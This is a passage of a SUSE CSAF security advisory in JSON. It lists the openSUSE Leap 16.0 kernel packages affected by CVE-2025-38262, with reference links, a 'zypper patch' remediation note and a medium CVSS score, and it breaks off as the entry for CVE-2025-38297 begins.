"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38262",
"url": "https://www.suse.com/security/cve/CVE-2025-38262"
},
{
"category": "external",
"summary": "SUSE Bug 1246282 for CVE-2025-38262",
"url": "https://bugzilla.suse.com/1246282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38262"
},
{
"cve": "CVE-2025-38297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38297"
}
],
"notes": [
{
